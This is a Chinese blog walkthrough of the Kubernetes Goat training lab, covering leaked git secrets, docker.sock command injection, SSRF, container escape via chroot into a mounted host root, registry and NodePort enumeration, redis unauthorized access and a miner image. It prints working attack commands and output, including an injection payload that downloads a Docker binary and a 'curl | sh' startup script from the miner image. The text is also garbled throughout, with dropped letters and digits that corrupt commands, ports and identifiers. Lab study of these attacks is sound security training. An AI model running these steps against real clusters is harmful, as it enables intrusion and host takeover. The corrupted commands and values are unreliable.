您现在的位置是:首页 > 编程 > 

Kubernetes Goat:Kubernetes 漏洞靶场

2025-07-27 01:26:30
Kubernetes Goat:Kubernetes 漏洞靶场 代码中的敏感keys(Sensitive keys in codebases)网站文字写着(翻译后如下):欢迎使用构建代码服务。 该服务是使用具有 CI/CD 管道和现代工具集(如 Git、Docker、AWS 等)的容器构建的。给的是一个web,就是代码泄露,里面包含了Sensitive keys可以通过目录爆破工具dirsearc

Kubernetes Goat:Kubernetes 漏洞靶场

代码中的敏感keys(Sensitive keys in codebases)

网站文字写着(翻译后如下):

欢迎使用构建代码服务。 该服务是使用具有 CI/CD 管道和现代工具集(如 Git、Docker、AWS 等)的容器构建的。

给的是一个web,就是代码泄露,里面包含了Sensitive keys

可以通过目录爆破工具dirsearch进行目录爆破,确认是git泄露,再用相应工具泄露

通过git-dumper下载源码

有一个提交,环境变量比较敏感

切换过去

代码语言:javascript代码运行次数:0运行复制
$ git checkout d7c17ad18c574109cd5c4c648ffe551755b576
ote: checking out 'd7c17ad18c574109cd5c4c648ffe551755b576'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at d7c17a... Inlcuded custom environmental variables

跟原来比,多了一个隐藏文件.env,一看是aws的一些key

代码语言:javascript代码运行次数:0运行复制
$ ls -a
.  ..  .env  .git    go.sum  main.go  
$ cat .env
[build-code-aws]
aws_access_key_id = AKIVSHD624H22G1KIDC
aws_secret_access_key = cgGn4+gDgnriogn4g+4ig4bg4g44gg4Dox7c1M
k8s_goat_flag = k8s-goat-51bc782065561b0c99280f62510bcc

进入pod中

代码语言:javascript代码运行次数:0运行复制
export POD_AME=$(kubectl get pods --namespace default -l "app=build-code" -o jsonpath="{.items[0].}")
kubectl exec -it $POD_AME -- sh

执行trufflehog .来分析

代码语言:javascript代码运行次数:0运行复制
/app # trufflehog .
~~~~~~~~~~~~~~~~~~~~~
Reason: High Entropy
Date: 2020-11-06 22:9:5
Hash: 7daa5f4cda812faa9c62966ba57ee9047ee6b577
Filepath: .env
Branch: origin/master
Commit: updated the endpoints and routes

@@ -0,0 +1,5 @@
+[build-code-aws]
+aws_access_key_id = AKIVSHD624H22G1KIDC
+aws_secret_access_key = cgGn4+gDgnriogn4g+4ig4bg4g44gg4Dox7c1M
+k8s_goat_flag = k8s-goat-51bc782065561b0c99280f62510bcc
+

~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
Reason: High Entropy
Date: 2020-11-06 22:9:5
Hash: 7daa5f4cda812faa9c62966ba57ee9047ee6b577
Filepath: go.sum
Branch: origin/master
Commit: updated the endpoints and routes

@@ -1,496 +1,25 @@
-cloud.google/go v0.26.0/ h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
......
......
......
......
......
......

这个工具可通过pip安装

代码语言:javascript代码运行次数:0运行复制
pip install trufflehog

DID (docker-in-docker) exploitation

这个就是命令注入,之后看到把docker.sock映射到里面了

/var/run/docker.sock是Docker守护进程(Docker daemon)默认监听的Unix域套接字(Unix domain socket),假如被映射到容器内,那么我们就可以跟Docker daemon进行通信,从而执行一些命令

可以通过下载docker静态二进制文件进行利用,下面是查看主机上面有什么镜像

代码语言:javascript代码运行次数:0运行复制
127.0.0.1;wget .0. -O /tmp/docker-19.0. && tar -xvzf /tmp/docker-19.0. -C /tmp/ ;/tmp/docker/docker -H unix:///custom/docker/docker.sock images

假如利用的话就是拉取指定的后门镜像并运行,运行过程中镜像将宿主机的根目录/挂载到容器内部的/host目录下,便于通过后门容器修改宿主机本地文件(如crontab)来完成逃逸。

在配置文件中也能看到目录映射

Kubernetes (K8S) 中的 SSRF

这是一个内部API代理,5000端口

看到有个metadata-db的东东

不断深入,发现http://metadata-db/latest/secrets/kubernetes-goat

解码一下

代码语言:javascript代码运行次数:0运行复制
echo "azhzLWdvYXQtY2E5MGVmODVkYjdhWFlZjAxOThkMDJmYjBkZjljYWI=" | base64 -d
k8s-goat-ca90ef85db7a5aef0198d02fb0df9cab

容器逃逸(Container escape to the host system)

为了适应更复杂的权限需求,从 2.2 版本起 Linux 内核能够进一步将超级用户的权限分解为细颗粒度的单元,这些单元称为 capabilities。例如,capability CAP_CHOW 允许用户对文件的 UID 和 GID 进行任意修改,即执行 chown 命令。几乎所有与超级用户相关的特权都被分解成了单独的 capability。

在docker中可以使用capsh --print输出各种capability权限

代码语言:javascript代码运行次数:0运行复制
root@nsfocus:/# capsh --print
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=

通过跟正常的机器输出的权限进行对比,基本没什么差别,这是具有所有权限的root

通过mount命令可以看到挂载了一个/host-system目录

通过df命令也可以看到,只不过我们不确定这是不是挂载的

看名字应该是宿主机目录的,我们ls一下,这看着是整个宿主机的根目录都映射进来了

代码语言:javascript代码运行次数:0运行复制
root@nsfocus:~# ls /host-system/
bin  boot  cdrom  dev  etc  home  lib  lib2  lib64  libx2  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  swap.img  sys  tmp  usr  var
root@nsfocus:~#

通过chroot命令,我们可以获取宿主机的执行权限

代码语言:javascript代码运行次数:0运行复制
root@nsfocus:~# chroot /host-system/ bash
root@nsfocus:/# ls
bin  boot  cdrom  dev  etc  home  lib  lib2  lib64  libx2  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  swap.img  sys  tmp  usr  var
root@nsfocus:/# docker ps
COTAIER ID   IMAGE                                                 COMMAD                  CREATED      STATUS      PORTS     AMES
f0a9afd6f2b6   madhuakula/k8s-goat-info-app                          "python /app.py"          days ago   Up  days             k8s_info-app_internal-proxy-deployment-5d99cbbdf7-wqmgr_default_efb4eb97-4aa0-4da2-9a9-a0a5dc762649_0
628fcee2fd49   madhuakula/k8s-goat-internal-api                      "docker-entrypoint.s…"   4 days ago   Up 4 days             k8s_internal-api_internal-proxy-deployment-5d99cbbdf7-wqmgr_default_efb4eb97-4aa0-4da2-9a9-a0a5dc762649_0
df0495417aa4   registry.aliyuncs/google_containers/pause:.4.1   "/pause"                 4 days ago   Up 4 days             k8s_POD_internal-proxy-deployment-5d99cbbdf7-wqmgr_default_efb4eb97-4aa0-4da2-9a9-a0a5dc762649_0
5702cc4cdd60   madhuakula/k8s-goat-system-monitor                    "gotty -w bash"          4 days ago   Up 4 days             k8s_system-monitor_system-monitor-deployment-594c89b48f-97rs9_default_081f809d-8199-44bd-8f86-ac6942dfdc8_0
9c1ca7ec8f1a   madhuakula/k8s-goat-poor-registry                     "/entrypoint.sh regi…"   4 days ago   Up 4 days             k8s_poor-registry_poor-registry-deployment-6746b95974-j9xrw_default_d4820bb-48f0-4ebb-9657-c24d677c7cb_0
c899f8a99d   madhuakula/k8s-goat-home                              "/docker-entrypoint.…"   4 days ago   Up 4 days             k8s_kubernetes-goat-home_kubernetes-goat-home-deployment-757f96b7cd-tq5zh_default_ef99f1cd-b0ff-4d6a-9a2e-644acba79ee_0
4a7f9758778   madhuakula/k8s-goat-hidden-in-layers                  "sh -c 'tail -f /dev…"   4 days ago   Up 4 days             k8s_hidden-in-layers_hidden-in-layers-lbwbn_default_2ab772a-e44-4cae-8ede-beca97d662ab_0
......
......
......
......
......
......

还可以通过kubectl控制,查看集(这里需要指定配置文件)

代码语言:javascript代码运行次数:0运行复制
root@nsfocus:/# kubectl --kubeconfig /etc/kubernetes/ get pods
AME                                               READY   STATUS      RESTARTS   AGE
batch-check-job-mrd2q                              0/1     Completed   0          4d4h
build-code-deployment-99d5f65db-hxllz              1/1     Running     0          4d4h
health-check-deployment-66c59d7f6f-qf5b7           1/1     Running     0          4d4h
hidden-in-layers-lbwbn                             1/1     Running     0          4d4h
internal-proxy-deployment-5d99cbbdf7-wqmgr         2/2     Running     0          d2h
kubernetes-goat-home-deployment-757f96b7cd-tq5zh   1/1     Running     0          4d4h
metadata-db-77987b74b-2tqjr                        1/1     Running     0          4d4h
poor-registry-deployment-6746b95974-j9xrw          1/1     Running     0          4d4h
system-monitor-deployment-594c89b48f-97rs9         1/1     Running     0          4d4h
root@nsfocus:/# kubectl --kubeconfig /etc/kubernetes/ get nodes
AME         STATUS   ROLES                  AGE     VERSIO
k8s-master   Ready    control-plane,master   4d20h   v1.21.1
nsfocus      Ready    <none>                 4d20h   v1.21.1

我们查看一下部署的yaml文件,可以看到除了挂载根目录到/host-system,securityContext那里还有allowPrivilegeEscalation: true和privileged: true,这两个可是很危险的,跟docker的–privileged

代码语言:javascript代码运行次数:0运行复制
root@k8s-master:~/kubernetes-goat/scenarios/system-monitor# cat deployment.yaml 
apiVersion: v1
kind: Secret
metadata:
  name: goatvault
type: Opaque
data:
  k8sgoatvaultkey: azhzLWdvYXQtY2QyZGEyzIyDU5MWRhMmI0OGVmODM4MjZhOGE2YzM=

---
apiVersion: apps/v1
kind: Deployment
......
......
......
volumes:
      - name: host-filesystem
        hostPath:
          path: /
      containers:
      - name: system-monitor
        image: madhuakula/k8s-goat-system-monitor
        resources:
          limits:
            memory: "50Mi"
            cpu: "20m"
        securityContext:
          allowPrivilegeEscalation: true
          privileged: true
        ports:
        - containerPort: 8080
        volumeMounts:
        - name: host-filesystem
          mountPath: /host-system
......
......
......

Docker CIS 基准分析

CIS即Center for Internet Security (CIS) 为安全基准计划提供了定义明确、公正、基于一致性的行业最佳实践来帮助组织评估和增强其安全性

Docker Bench for Security是一款脚本工具,用于检查围绕在生产环境中部署Docker容器的数十种常见最佳实践。github地址:

首先部署 Docker CIS 基准测试的容器

代码语言:javascript代码运行次数:0运行复制
kubectl apply -f scenarios/docker-bench-security/deployment.yaml

进入容器

代码语言:javascript代码运行次数:0运行复制
kubectl exec -it docker-bench-security-XXXXX -- sh

执行~/docker-bench-security中的docker-bench-security.sh即可执行检查

其实上面的scenarios/docker-bench-security/deployment.yaml是将一些宿主机目录映射到容器中,从而执行的检查。

所以我们也可以直接从github下载脚本到宿主机进行检查

Kubernetes CIS 基准分析

上面是docker,这次是Kubernetes,github地址:

两个命令部署即可

代码语言:javascript代码运行次数:0运行复制
kubectl apply -f scenarios/kube-bench-security/node-job.yaml

kubectl apply -f scenarios/kube-bench-security/master-job.yaml

查看yaml,两个执行的命令分别是command: ["kube-bench", "node"]command: ["kube-bench", "master"]

不过我看github上的yaml的command已经有所改变

代码语言:javascript代码运行次数:0运行复制
# .yaml
command: ["kube-bench", "run", "--targets", "master"]
# .yaml
command: ["kube-bench", "run", "--targets", "node"]

执行后可以看到jobs多了一个kube-bench-node

代码语言:javascript代码运行次数:0运行复制
root@k8s-master:~/kubernetes-goat# kubectl apply -f scenarios/kube-bench-security/node-job.yaml
job.batch/kube-bench-node created
root@k8s-master:~/kubernetes-goat# kubectl get jobs
AME               COMPLETIOS   DURATIO   AGE
batch-check-job    1/1           6s        4d6h
hidden-in-layers   0/1           4d6h       4d6h
kube-bench-node    0/1           14s        14s

不过通过查看pod的状态是Error

代码语言:javascript代码运行次数:0运行复制
root@k8s-master:~/kubernetes-goat# kubectl get pods
AME                                               READY   STATUS      RESTARTS   AGE
batch-check-job-mrd2q                              0/1     Completed   0          4d6h
build-code-deployment-99d5f65db-hxllz              1/1     Running     0          4d6h
docker-bench-security-dvlgz                        1/1     Running     0          61m
health-check-deployment-66c59d7f6f-qf5b7           1/1     Running     0          4d6h
hidden-in-layers-lbwbn                             1/1     Running     0          4d6h
internal-proxy-deployment-5d99cbbdf7-wqmgr         2/2     Running     0          4d1h
kube-bench-node-44mxv                              0/1     Error       0          12m
kube-bench-node-8vf74                              0/1     Error       0          10m
kube-bench-node-lfnmt                              0/1     Error       0          8m10s
kube-bench-node-nmfn8                              0/1     Error       0          10m
kube-bench-node-t67b8                              0/1     Error       0          11m
kube-bench-node-xnlvw                              0/1     Error       0          5m0s
kube-bench-node-zb54v                              0/1     Error       0          9m0s
kubernetes-goat-home-deployment-757f96b7cd-tq5zh   1/1     Running     0          4d6h
metadata-db-77987b74b-2tqjr                        1/1     Running     0          4d6h
poor-registry-deployment-6746b95974-j9xrw          1/1     Running     0          4d6h
system-monitor-deployment-594c89b48f-97rs9         1/1     Running     0          4d6h

后面修改command后再试

代码语言:javascript代码运行次数:0运行复制
root@k8s-master:~/kubernetes-goat# kubectl delete -f ./scenarios/kube-bench-security/node-job.yaml 
job.batch "kube-bench-node" deleted
root@k8s-master:~/kubernetes-goat# kubectl apply -f ./scenarios/kube-bench-security/node-job.yaml 
job.batch/kube-bench-node created

便可以了,所以还是得用最新的配置文件

代码语言:javascript代码运行次数:0运行复制
root@k8s-master:~/kubernetes-goat# kubectl get pods
AME                                               READY   STATUS      RESTARTS   AGE
batch-check-job-mrd2q                              0/1     Completed   0          4d6h
build-code-deployment-99d5f65db-hxllz              1/1     Running     0          4d6h
docker-bench-security-dvlgz                        1/1     Running     0          6m
health-check-deployment-66c59d7f6f-qf5b7           1/1     Running     0          4d6h
hidden-in-layers-lbwbn                             1/1     Running     0          4d6h
internal-proxy-deployment-5d99cbbdf7-wqmgr         2/2     Running     0          4d1h
kube-bench-node-8xndd                              0/1     Completed   0          68s
kubernetes-goat-home-deployment-757f96b7cd-tq5zh   1/1     Running     0          4d6h
metadata-db-77987b74b-2tqjr                        1/1     Running     0          4d6h
poor-registry-deployment-6746b95974-j9xrw          1/1     Running     0          4d6h
system-monitor-deployment-594c89b48f-97rs9         1/1     Running     0          4d6h

可以通过logs查看审计的log

代码语言:javascript代码运行次数:0运行复制
kubectl logs -f kube-bench-XXX-xxxxx

攻击私有仓库(Attacking private registry)

通过访问/v2/_catalog可以获取所有repositories

代码语言:javascript代码运行次数:0运行复制
$ curl http://192.168.2.174:125/v2/_catalog
{"repositories":["madhuakula/k8s-goat-alpine","madhuakula/k8s-goat-users-repo"]}

获取第二个镜像的信息

代码语言:javascript代码运行次数:0运行复制
$ curl http://192.168.2.174:125/v2/madhuakula/k8s-goat-users-repo/manifests/latest
{
   "schemaVersion": 1,
   "name": "madhuakula/k8s-goat-users-repo",
   "tag": "latest",
   "architecture": "amd64",
   "fsLayers": [
      {
         "blobSum": "sha256:aed95caeb02ffe68cdd9fd84406680ae9d6cb16422d00e8a7c22955b46d4"
      },
      {
         "blobSum": "sha256:56ef547591f025984eb7642226a99ff4a91fa47417faa4575e48e61bd0"
      },
......
......
......
......
......
......

从中有环境变量信息

odePort暴露服务

odePort在集中的主机节点上为Service提供一个代理端口,以允许从主机网络上对Service进行访问。

这里是本地搭建的,没有公网ip,所以也就没有外部IP——EXTERAL-IP

代码语言:javascript代码运行次数:0运行复制
$ kubectl get nodes -o wide
AME         STATUS   ROLES                  AGE     VERSIO    ITERAL-IP     EXTERAL-IP   OS-IMAGE             KEREL-VERSIO     COTAIER-RUTIME
k8s-master   Ready    control-plane,master   4d2h   v1.21.1   192.168.2.174   <none>        Ubuntu 20.04.2 LTS   5.4.0-72-generic   docker://20.10.16
nsfocus      Ready    <none>                 4d2h   v1.21.1   192.168.2.172   <none>        Ubuntu 20.04.2 LTS   5.4.0-72-generic   docker://20.10.16

默认情况下,odePort的端口范围是 0000-2767,使用nmap扫描,这里就以内网ip为例了

代码语言:javascript代码运行次数:0运行复制
$ nmap -T4 -p 0000-2767 192.168.2.172
Starting map 7.80 (  ) at 2022-06-20 18:57 CST
map scan report for 192.168.2.172
Host is up (0.0055s latency).
ot shown: 2767 closed ports
PORT      STATE SERVICE
000/tcp open  amicon-fpsu-ra
MAC Address: 00:50:56:A2:18:00 (VMware)

map done: 1 IP address (1 host up) scanned in 0.50 seconds

可以看到是000端口

代码语言:javascript代码运行次数:0运行复制
$ curl http://192.168.2.172:000/
{"info": "Refer to internal http://metadata-db for more information"}

Helm v2 tiller to Pw the cluster[已弃用]

这已经从 Kubernetes Goat 启弃用,但是还可以看一下

Helm 是 Kubernetes 部署和管理应用程序的包管理器,默认配置和设置是不安全的,如果攻击者可以访问任何一个 pod 并且没有网络安全策略 (SP),攻击者可以获得完整的集访问权限和接管集管理员权限。

启动环境

代码语言:javascript代码运行次数:0运行复制
kubectl run --rm --restart=ever -it --image=madhuakula/k8s-goat-helm-tiller -- bash

默认情况下,helm 版本 2 有一个 tiller 组件,它具有完整的集管理 RBAC 权限

这个暂时有点问题,不能实践,就是默认不允许执行kubectl get secrets -n kube-system,通过 helm 和 tiller 服务的帮助下部署pwnchart,它将授予所有默认服务帐户 cluster-admin 访问权限,从而可以执行kubectl get secrets -n kube-system

分析挖矿容器(Analysing crypto miner container)

一般我们从 Docker Hub 等公共容器仓库下载镜像,黑客可能通过上传运行挖矿程序的镜像到仓库来让用户帮忙挖矿。

先查看 Kubernetes 集中的 jobs

代码语言:javascript代码运行次数:0运行复制
$ kubectl get jobs -A
AMESPACE   AME               COMPLETIOS   DURATIO   AGE
default     batch-check-job    1/1           6s        5d5h
default     hidden-in-layers   0/1           5d5h       5d5h
default     kube-bench-node    1/1           29s        22h

kube-bench-node是之前node的基线检查

获取job的信息

代码语言:javascript代码运行次数:0运行复制
$ kubectl describe job batch-check-job
ame:           batch-check-job
amespace:      default
Selector:       controller-uid=2ef5201-70c7-48f1-8df7-919674f2ca7
Labels:         controller-uid=2ef5201-70c7-48f1-8df7-919674f2ca7
                job-name=batch-check-job
Annotati:    <none>
Parallelism:    1
Completi:    1
Start Time:     Thu, 16 Jun 2022 10:5:5 +0800
Completed At:   Thu, 16 Jun 2022 10:54:11 +0800
Duration:       6s
Pods Statuses:  0 Running / 1 Succeeded / 0 Failed
Pod Template:
  Labels:  controller-uid=2ef5201-70c7-48f1-8df7-919674f2ca7
           job-name=batch-check-job
  Containers:
   batch-check:
    Image:        madhuakula/k8s-goat-batch-check
    Port:         <none>
    Host Port:    <none>
    Environment:  <none>
    Mounts:       <none>
  Volumes:        <none>
Events:           <none>

获取job对应的pods

代码语言:javascript代码运行次数:0运行复制
$ kubectl get pods --namespace default -l "job-name=batch-check-job"
AME                    READY   STATUS      RESTARTS   AGE
batch-check-job-mrd2q   0/1     Completed   0          5d5h

以yaml格式输出pod的信息

代码语言:javascript代码运行次数:0运行复制
$ kubectl get pod batch-check-job-mrd2q -o yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: "2022-06-16T02:5:5Z"
  generateame: batch-check-job-
  labels:
    controller-uid: 2ef5201-70c7-48f1-8df7-919674f2ca7
    job-name: batch-check-job
  name: batch-check-job-mrd2q
  namespace: default
  ownerReferences:
  - apiVersion: batch/v1
    blockOwnerDeletion: true
    controller: true
    kind: Job
    name: batch-check-job
    uid: 2ef5201-70c7-48f1-8df7-919674f2ca7
  resourceVersion: "72916"
  uid: 27657ad4-4fa9-48d0-bdd8-c1117acd2
spec:
  containers:
  - image: madhuakula/k8s-goat-batch-check
    imagePullPolicy: Always
    name: batch-check
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-pdfwk
      readOnly: true
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  nodeame: nsfocus
  preemptionPolicy: PreemptLowerPriority
  priority: 0
  restartPolicy: ever
  schedulerame: default-scheduler
  securityContext: {}
  serviceAccount: default
  serviceAccountame: default
  terminationGracePeriodSeconds: 0
  tolerati:
  - effect: oExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 00
  - effect: oExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 00
  volumes:
  - name: kube-api-access-pdfwk
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 607
          path: token
      - configMap:
          items:
          - key: 
            path: 
          name: kube-root-
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: space
            path: namespace
status:
  conditi:
  - lastProbeTime: null
    lastTransitionTime: "2022-06-16T02:5:5Z"
    reason: PodCompleted
    status: "True"
    type: Initialized
  - lastProbeTime: null
    lastTransitionTime: "2022-06-16T02:5:5Z"
    reason: PodCompleted
    status: "False"
    type: Ready
  - lastProbeTime: null
    lastTransitionTime: "2022-06-16T02:5:5Z"
    reason: PodCompleted
    status: "False"
    type: ContainersReady
  - lastProbeTime: null
    lastTransitionTime: "2022-06-16T02:5:5Z"
    status: "True"
    type: PodScheduled
  containerStatuses:
  - containerID: docker://c724beda2e50f66ce184555a2b62f0f678070ac6d290c9ee7462feb1f
    image: madhuakula/k8s-goat-batch-check:latest
    imageID: docker-pullable://madhuakula/k8s-goat-batch-check@sha256:5be81d47c086a0b74bbcdefa5fba0ebb78c8acbd2c0700546b5ff687658ef
    lastState: {}
    name: batch-check
    ready: false
    restartCount: 0
    started: false
    state:
      terminated:
        containerID: docker://c724beda2e50f66ce184555a2b62f0f678070ac6d290c9ee7462feb1f
        exitCode: 0
        finishedAt: "2022-06-16T02:54:11Z"
        reason: Completed
        startedAt: "2022-06-16T02:54:11Z"
  hostIP: 192.168.2.172
  phase: Succeeded
  podIP: 10.244.1.4
  podIPs:
  - ip: 10.244.1.4
  qosClass: BestEffort
  startTime: "2022-06-16T02:5:5Z"

batch-check-job使用的是madhuakula/k8s-goat-batch-check镜像

代码语言:javascript代码运行次数:0运行复制
$ kubectl get pod batch-check-job-mrd2q -o yaml | grep image
  - image: madhuakula/k8s-goat-batch-check
    imagePullPolicy: Always
    image: madhuakula/k8s-goat-batch-check:latest
    imageID: docker-pullable://madhuakula/k8s-goat-batch-check@sha256:5be81d47c086a0b74bbcdefa5fba0ebb78c8acbd2c0700546b5ff687658ef

我们可以通过docker history查看image每一层所执行的命令,--no-trunc是不要截断输出 (下面这个需要在node执行,因为只有在node有这个镜像)

代码语言:javascript代码运行次数:0运行复制
$ docker history --no-trunc madhuakula/k8s-goat-batch-check
IMAGE                                                                     CREATED        CREATED BY                                                                                                                                                                                                                                                                                 SIZE      COMMET
sha256:cb4bcb572b744686c6854282c58e9ac7f2efc294aae49ce4fab7a275c7   5 weeks ago    CMD ["ps" "auxx"]                                                                                                                                                                                                                                                                          0B        buildkit.dockerfile.v0
<missing>                                                                 5 weeks ago    RU /bin/sh -c apk add --no-cache htop curl ca-certificates    && echo "curl -sSL  && echo 'id' | sh " > /usr/bin/system-startup     && chmod +x /usr/bin/system-startup     && rm -rf /tmp/* # buildkit   2.96MB    buildkit.dockerfile.v0
<missing>                                                                 5 weeks ago    LABEL MAITAIER=Madhu Akula IFO=Kubernetes Goat                                                                                                                                                                                                                                          0B        buildkit.dockerfile.v0
<missing>                                                                 2 months ago   /bin/sh -c #(nop)  CMD ["/bin/sh"]                                                                                                                                                                                                                                                         0B        
<missing>                                                                 2 months ago   /bin/sh -c #(nop) ADD file:5d67d25daa14ce1f6cf66e4c7fd4f4b85a759a9d9efbfd9ff852b5b56e4 in /                                                                                                                                                                                           5.57MB

可以看到执行了这个可疑的命令

代码语言:javascript代码运行次数:0运行复制
/bin/sh -c apk add --no-cache htop curl ca-certificates    && echo "curl -sSL  && echo 'id' | sh " > /usr/bin/system-startup     && chmod +x /usr/bin/system-startup     && rm -rf /tmp/*

Kubernetes 命名空间绕过(Kubernetes namespaces bypass)

Kubernetes 中有不同的命名空间并且资源被部署和管理时,它们是安全的并且无法相互访问。

默认情况下,Kubernetes 使用平面网络架构,这意味着集中的任何 pod/服务都可以与其他人通信。

默认情况下,集内的命名空间没有任何网络安全限制。命名空间中的任何人都可以与其他命名空间通信。

启动环境

代码语言:javascript代码运行次数:0运行复制
kubectl run --rm -it hacker-container --image=madhuakula/hacker-container -- sh

先编辑vi /etc/zmap/,注释里面的10.0.0.0/8这一行,不然不能扫描

代码语言:javascript代码运行次数:0运行复制
zmap -p 679 10.0.0.0/8 -o 
代码语言:javascript代码运行次数:0运行复制
~ # ifconfig 
eth0      Link encap:Ethernet  HWaddr 76:20:B2:1E:01:E8  
          inet addr:10.244.1.1  Bcast:10.244.1.255  Mask:255.255.255.0
          UP BROADCAST RUIG MULTICAST  MTU:1450  Metric:1
          RX packets:258424 errors:0 dropped:0 overruns:0 frame:0
          TX packets:22995250 errors:0 dropped:0 overruns:0 carrier:0
          collisi:0 txqueuelen:0 
          RX bytes:18171895 (17.2 MiB)  TX bytes:1229657656 (1.1 GiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUIG  MTU:6556  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisi:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

~ # cat  | grep 10.244
10.244.1.5
代码语言:javascript代码运行次数:0运行复制
~ # redis-cli -h 10.244.1.5
10.244.1.5:679> KEYS *
1) "SECRETSTUFF"
10.244.1.5:679> GET SECRETSTUFF
"k8s-goat-a5ae446faafa9d0514bff96ab8a40"

这其实在现实中就是redis未授权访问,Redis服务器假如以root身份运行,黑客就能够给root账户写入SSH公钥文件,然后直接通过SSH登录目标受害的服务器

获取环境信息

通过/proc/self/cgroup 文件可以获取到docker容器的id

代码语言:javascript代码运行次数:0运行复制
root@nsfocus:/home# cat /proc/self/cgroup  
12:blkio:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
11:pids:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
10:rdma:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
9:devices:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
8:freezer:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
7:perf_event:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
6:cpuset:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
5:hugetlb:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
4:memory:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
:net_cls,net_prio:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
2:cpu,cpuacct:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
1:name=systemd:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
0::/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope

可以通过在node执行ps看到

代码语言:javascript代码运行次数:0运行复制
$ docker ps -a | grep 5702
5702cc4cdd60   madhuakula/k8s-goat-system-monitor                    "gotty -w bash"          6 days ago     Up 6 days                           k8s_system-monitor_system-monitor-deployment-594c89b48f-97rs9_default_081f809d-8199-44bd-8f86-ac6942dfdc8_0

其他的信息收集

代码语言:javascript代码运行次数:0运行复制
cat /proc/self/cgroup
cat /etc/hosts
# 挂载信息
mount
# 查看文件系统
ls -la /home/
printenv或者直接env

在环境变量中就有flag了

DOS内存或CPU等资源

